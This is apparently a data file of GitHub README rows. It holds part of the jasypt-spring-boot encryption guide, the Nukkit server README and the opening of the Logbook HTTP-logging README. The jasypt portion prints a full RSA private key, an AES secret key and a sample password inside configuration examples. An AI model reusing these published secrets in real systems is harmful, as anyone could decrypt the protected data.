MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6
M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg== - -``` - -#### DER key as a resource location -```yaml -jasypt: - encryptor: - privateKeyLocation: classpath:private_key.der - -``` - -#### PEM key as string -```yaml -jasypt: - encryptor: - privateKeyFormat: PEM - privateKeyString: |- - -----BEGIN PRIVATE KEY----- - MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM - ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L - IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39 - orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i - G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA - uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr - 2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU - vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54 - kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ - aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI - DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB - V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa - zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu - PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk - bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO - 5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ - Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff - umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI - ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3 - UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584 - JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/ - jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB - t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1 - Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0 - 
lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa - rd+dewfKoPnWw0WyGFEWCg== - -----END PRIVATE KEY----- - -``` - -#### PEM key as a resource location -```yaml -jasypt: - encryptor: - privateKeyFormat: PEM - privateKeyLocation: classpath:private_key.pem - -``` - -### Encrypting properties - -There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt -your properties: - -#### DER Format - -```java -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; -import org.jasypt.encryption.StringEncryptor; - -public class PropertyEncryptor { - public static void main(String[] args) { - SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); - config.setPublicKey(""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB""); - StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); - String message = ""chupacabras""; - String encrypted = encryptor.encrypt(message); - System.out.printf(""Encrypted message %s\n"", encrypted); - } -} -``` - -#### PEM Format - -```java -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; -import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; -import org.jasypt.encryption.StringEncryptor; -import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM; - -public class PropertyEncryptor { - public static void main(String[] args) { - SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); - config.setKeyFormat(PEM); - 
config.setPublicKey(""-----BEGIN PUBLIC KEY-----\n"" + - ""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n"" + - ""VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n"" + - ""nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n"" + - ""FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n"" + - ""nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n"" + - ""IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n"" + - ""kQIDAQAB\n"" + - ""-----END PUBLIC KEY-----\n""); - StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); - String message = ""chupacabras""; - String encrypted = encryptor.encrypt(message); - System.out.printf(""Encrypted message %s\n"", encrypted); - } -} -``` -## AES 256-GCM Encryption -As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`.
The underlying algorithm used is `AES/GCM/NoPadding`, so make sure it is available in your JDK.
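As a quick sanity check, you can verify that `AES/GCM/NoPadding` round-trips correctly with nothing but the JDK. This sketch is independent of jasypt, and the class and method names here are made up for illustration:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;

public class GcmAvailabilityCheck {

    // Encrypts and then decrypts a value with AES-256 in GCM mode using only the JDK.
    static String roundTrip(String plaintext) throws Exception {
        KeyGenerator generator = KeyGenerator.getInstance("AES");
        generator.init(256); // 256-bit keys need the unrestricted crypto policy on very old JDK 8 builds
        SecretKey key = generator.generateKey();

        byte[] iv = new byte[12]; // 96-bit IV, the recommended size for GCM
        new SecureRandom().nextBytes(iv);

        Cipher encrypt = Cipher.getInstance("AES/GCM/NoPadding");
        encrypt.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        byte[] ciphertext = encrypt.doFinal(plaintext.getBytes(StandardCharsets.UTF_8));

        Cipher decrypt = Cipher.getInstance("AES/GCM/NoPadding");
        decrypt.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));
        return new String(decrypt.doFinal(ciphertext), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        System.out.println(roundTrip("chupacabras")); // prints "chupacabras" if GCM is available
    }
}
```

If the round trip succeeds, the algorithm is available to jasypt as well.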
The `SimpleGCMByteEncryptor` uses an `IVGenerator` to encrypt properties. You can configure it with the property `jasypt.encryptor.iv-generator-classname` if you don't want to
use the default implementation, `RandomIvGenerator`.

### Using a key

When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64.
The base64 string value can be set to `jasypt.encryptor.gcm-secret-key-string`, or you can save it in a file and use a spring resource locator to that file in the property `jasypt.encryptor.gcm-secret-key-location`. For instance:

```properties
jasypt.encryptor.gcm-secret-key-string="PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="
#OR
jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64
```

Optionally, you can create your own `StringEncryptor` bean:

```java
@Bean("encryptorBean")
public StringEncryptor stringEncryptor() {
    SimpleGCMConfig config = new SimpleGCMConfig();
    config.setSecretKey("PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=");
    return new SimpleGCMStringEncryptor(config);
}
```

### Using a password

Alternatively, you can use a password to encrypt/decrypt properties with AES 256-GCM. The password is used to generate a
key on startup, so there are a few properties you need to/can set. These are:

```properties
jasypt.encryptor.gcm-secret-key-password="chupacabras"
#Optional, defaults to "1000"
jasypt.encryptor.key-obtention-iterations="1000"
#Optional, defaults to 0, no salt.
If provided, specify the salt string in base64 format
jasypt.encryptor.gcm-secret-key-salt="HrqoFr44GtkAhhYN+jP8Ag=="
#Optional, defaults to PBKDF2WithHmacSHA256
jasypt.encryptor.gcm-secret-key-algorithm="PBKDF2WithHmacSHA256"
```

Make sure these parameters are the same if you're encrypting your secrets with external tools.
Optionally, you can create your own `StringEncryptor` bean:

```java
@Bean("encryptorBean")
public StringEncryptor stringEncryptor() {
    SimpleGCMConfig config = new SimpleGCMConfig();
    config.setSecretKeyPassword("chupacabras");
    config.setSecretKeyIterations(1000);
    config.setSecretKeySalt("HrqoFr44GtkAhhYN+jP8Ag==");
    config.setSecretKeyAlgorithm("PBKDF2WithHmacSHA256");
    return new SimpleGCMStringEncryptor(config);
}
```

### Encrypting properties with AES GCM-256

You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties) section.

## Demo App

The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples.
The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) demo app explicitly sets a System property with the encryption password before the app runs.
For a slightly more realistic scenario, try removing the line where the system property is set, build the app with maven, and then run:

```
java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password
```

This passes the encryption password as a command line argument. Alternatively, run it like this:

```
java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar
```

This passes the encryption password as a System property.
If you need to pass this property as an Environment Variable, you can accomplish this by creating application.properties or application.yml and adding:

```
jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:}
```

or in YAML:

```
jasypt:
  encryptor:
    password: ${JASYPT_ENCRYPTOR_PASSWORD:}
```

Basically, this defines the `jasypt.encryptor.password` property as pointing to a different property, `JASYPT_ENCRYPTOR_PASSWORD`, which you can set with an Environment Variable and can also override via System Properties. This technique can also be used to translate property names/values for any other library you need.
This is also available in the Demo app, so you can run it like this:

```
JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar
```

**Note:** When using Gradle as the build tool, the processResources task fails because of the '$' character. To solve this, you just need to escape the variable like this: '\\$'.

## Other Demo Apps
While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive demo that showcases all the possible ways to encrypt/decrypt properties, there are several other demos that cover isolated scenarios.
[//]: # (## Flattr)

[//]: # ([![Flattr this git repo](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/@ubocchio/github/ulisesbocchio))
",0
CloudburstMC/Nukkit,Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software,2017-12-04T19:55:58Z,,"![nukkit](.github/images/banner.png)

[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE)
[![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/)
[![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK)

Introduction
-------------

Nukkit is nuclear-powered server software for Minecraft: Pocket Edition.
It has a few key advantages over other server software:

* Written in Java, Nukkit is faster and more stable.
* Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins.

Nukkit is still **under improvement**; we welcome contributions.

Links
--------------------

* __[News](https://nukkitx.com)__
* __[Forums](https://nukkitx.com/forums)__
* __[Discord](https://discord.gg/5PzMkyK)__
* __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__
* __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__
* __[Wiki](https://nukkitx.com/wiki/nukkit)__

Contributing
-------------
Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed.

Build JAR file
-------------
- `git clone https://github.com/CloudburstMC/Nukkit`
- `cd Nukkit`
- `git submodule update --init`
- `./gradlew shadowJar`

The compiled JAR can be found in the `target/` directory.

Running
-------------
Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`.
- -Plugin API -------------- -Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/). - -Docker -------------- - -Running Nukkit in [Docker](https://www.docker.com/) (17.05+ or higher). - -Build image from the source, - -``` -docker build -t nukkit . -``` - -Run once to generate the `nukkit-data` volume, default settings, and choose language, - -``` -docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit -``` -Docker Compose -------------- - -Use [docker-compose](https://docs.docker.com/compose/overview/) to start server on port `19132` and with `nukkit-data` volume, - -``` -docker-compose up -d -``` - -Kubernetes & Helm -------------- - -Validate the chart: - -`helm lint charts/nukkit` - -Dry run and print out rendered YAML: - -`helm install --dry-run --debug nukkit charts/nukkit` - -Install the chart: - -`helm install nukkit charts/nukkit` - -Or, with some different values: - -``` -helm install nukkit \ - --set image.tag=""arm64"" \ - --set service.type=""LoadBalancer"" \ - charts/nukkit -``` - -Or, the same but with a custom values from a file: - -``` -helm install nukkit \ - -f helm-values.local.yaml \ - charts/nukkit -``` - -Upgrade the chart: - -`helm upgrade nukkit charts/nukkit` - -Testing after deployment: - -`helm test nukkit` - -Completely remove the chart: - -`helm uninstall nukkit` -",0 -zalando/logbook,An extensible Java library for HTTP request and response logging,2015-09-14T15:29:12Z,,"# Logbook: HTTP request and response logging - -[![Logbook](docs/logbook.jpg)](#attributions) - -[![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html) -![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg) -[![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook) 
-[![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core) -[![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases) -[![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent) -[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE) -[![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/) - -> **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage. - -**Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application -developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit -requirements or investigating individual historic traffic issues. - -Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a -library/framework/etc. to it. 
## Features

- **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests
- **Customization**: of logging format, logging destination, and of the conditions that determine which requests to log
- **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks
- Optional obfuscation of sensitive data
- [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration
- [Scalyr](docs/scalyr.md) compatible
- Sensible defaults

## Dependencies

- Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required)
- Any build tool using Maven Central, or direct download
- Servlet Container (optional)
- Apache HTTP Client 4.x **or 5.x** (optional)
- JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional)
- JAX-RS 2.x Client and Server (optional)
- Netty 4.x (optional)
- OkHttp 2.x **or 3.x** (optional)
- Spring **6.x** or Spring 5.x (optional, see instructions below)
- Spring Boot **3.x** or 2.x (optional)
- Ktor (optional)
- logstash-logback-encoder 5.x (optional)

## Installation

Add the following dependency to your project:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-core</artifactId>
    <version>${logbook.version}</version>
</dependency>
```

### Spring 5 / Spring Boot 2 Support

For Spring 5 / Spring Boot 2 backwards compatibility please add the following import:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-servlet</artifactId>
    <version>${logbook.version}</version>
    <classifier>javax</classifier>
</dependency>
```

Additional modules/artifacts of Logbook always share the same version number.

Alternatively, you can import our *bill of materials*...

```xml
<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>org.zalando</groupId>
            <artifactId>logbook-bom</artifactId>
            <version>${logbook.version}</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>
```
... which allows you to omit versions:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-core</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-httpclient</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-jaxrs</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-json</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-netty</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-okhttp</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-okhttp2</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-servlet</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-spring-boot-starter</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-ktor-common</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-ktor-client</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-ktor-server</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-ktor</artifactId>
</dependency>
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-logstash</artifactId>
</dependency>
```
The logbook logger must be configured at `TRACE` level in order to log requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties`:

```
logging.level.org.zalando.logbook: TRACE
```

## Usage

All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together.
You can either create one using all the defaults:

```java
Logbook logbook = Logbook.create();
```

or create a customized version using the `LogbookBuilder`:

```java
Logbook logbook = Logbook.builder()
    .condition(new CustomCondition())
    .queryFilter(new CustomQueryFilter())
    .pathFilter(new CustomPathFilter())
    .headerFilter(new CustomHeaderFilter())
    .bodyFilter(new CustomBodyFilter())
    .requestFilter(new CustomRequestFilter())
    .responseFilter(new CustomResponseFilter())
    .sink(new DefaultSink(
        new CustomHttpLogFormatter(),
        new CustomHttpLogWriter()
    ))
    .build();
```

### Strategy

Logbook used to have a very rigid strategy for how to do request/response logging:

- Requests/responses are logged separately
- Requests/responses are logged as soon as possible
- Requests/responses are logged as a pair or not logged at all
  (i.e. no partial logging of traffic)

Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing)
implementations, but they were never ideal.

Starting with version 2.0, Logbook comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern)
at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java)
interface to understand the implications.
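The gist of the pattern is that the decision of what to log is delegated to a pluggable object. The sketch below uses a made-up `LoggingStrategy` interface to illustrate the idea; it is not Logbook's actual `Strategy` API:

```java
// A minimal illustration of the strategy pattern as applied to logging decisions:
// the policy (log the body or not) is swappable without touching the logging code.
interface LoggingStrategy {
    /** Decide whether a response with the given status should be logged with its body. */
    boolean logBody(int status);
}

// Mirrors the spirit of a "status at least" strategy: only log bodies for errors.
final class StatusAtLeast implements LoggingStrategy {
    private final int threshold;

    StatusAtLeast(final int threshold) {
        this.threshold = threshold;
    }

    @Override
    public boolean logBody(final int status) {
        return status >= threshold;
    }
}

public class StrategySketch {

    // Renders a (fake) log line, consulting the strategy for the body.
    static String render(final LoggingStrategy strategy, final int status, final String body) {
        return "HTTP " + status + (strategy.logBody(status) ? "\n" + body : "");
    }

    public static void main(String[] args) {
        LoggingStrategy strategy = new StatusAtLeast(400);
        System.out.println(render(strategy, 200, "{\"ok\":true}"));      // body omitted
        System.out.println(render(strategy, 500, "{\"error\":\"boom\"}")); // body logged
    }
}
```

Logbook's real `Strategy` works on whole requests and responses rather than a bare status code, but the extension point is the same shape: implement the interface, register it on the builder.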
Logbook comes with some built-in strategies:

- [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java)
- [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java)
- [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java)

### Attribute Extractor

Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a
list of key/value pairs that can be extracted from the request and/or response, and logged with them. The idea sprouted
from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject
claim from JWT tokens in the authorization header.

The `AttributeExtractor` interface has two `extract` methods: one that can extract attributes from the request only, and
one that has both the request and the response at its disposal. Both return an instance of the `HttpAttributes` class, which is
basically a fancy `Map<String, Object>`. Notice that since the map values are of type `Object`, they should have a
proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters
can work around this by implementing their own serialization logic. For instance, the built-in log formatter
`JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values.
Here is an example:

```java
final class OriginExtractor implements AttributeExtractor {

    @Override
    public HttpAttributes extract(final HttpRequest request) {
        return HttpAttributes.of("origin", request.getOrigin());
    }

}
```

Logbook must then be created by registering this attribute extractor:

```java
final Logbook logbook = Logbook.builder()
        .attributeExtractor(new OriginExtractor())
        .build();
```

This will result in request logs that include something like:

```text
"attributes":{"origin":"LOCAL"}
```

For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes.
The former extracts the first claim matching a list of claim names from the request JWT token.
The latter extracts all claims matching a list of claim names from the request JWT token.

If you need to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`:

```java
final List<AttributeExtractor> extractors = List.of(
        extractor1,
        extractor2,
        extractor3
);

final Logbook logbook = Logbook.builder()
        .attributeExtractor(new CompositeAttributeExtractor(extractors))
        .build();
```

### Phases

Logbook works in several different phases:

1. [Conditional](#conditional),
2. [Filtering](#filtering),
3. [Formatting](#formatting) and
4. [Writing](#writing)

Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default.

#### Conditional

Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check*
requests from a load balancer, or any request to management endpoints typically issued by developers.

Defining a condition is as easy as writing a special `Predicate<HttpRequest>` that decides whether a request (and its corresponding response) should be logged or not.
Alternatively, you can use and combine
predefined predicates:

```java
Logbook logbook = Logbook.builder()
    .condition(exclude(
        requestTo("/health"),
        requestTo("/admin/**"),
        contentType("application/octet-stream"),
        header("X-Secret", newHashSet("1", "true")::contains)))
    .build();
```

Exclusion patterns, e.g. `/admin/**`, loosely follow [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns)
without taking the query string of the URL into consideration.

#### Filtering

The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This
usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters —
e.g. *password*.

Logbook supports different types of filters:

| Type             | Operates on                    | Applies to | Default                                                                           |
|------------------|--------------------------------|------------|-----------------------------------------------------------------------------------|
| `QueryFilter`    | Query string                   | request    | `access_token`                                                                    |
| `PathFilter`     | Path                           | request    | n/a                                                                               |
| `HeaderFilter`   | Header (single key-value pair) | both       | `Authorization`                                                                   |
| `BodyFilter`     | Content-Type and body          | both       | json: `access_token` and `refresh_token`<br>form: `client_secret` and `password`  |
| `RequestFilter`  | `HttpRequest`                  | request    | Replace binary, multipart and stream bodies.                                      |
| `ResponseFilter` | `HttpResponse`                 | response   | Replace binary, multipart and stream bodies.                                      |

`QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all
cases. For more complicated setups one should fall back to the low-level variants, i.e. `RequestFilter` and `ResponseFilter`
respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`).

You can configure filters like this:

```java
import static org.zalando.logbook.core.HeaderFilters.authorization;
import static org.zalando.logbook.core.HeaderFilters.eachHeader;
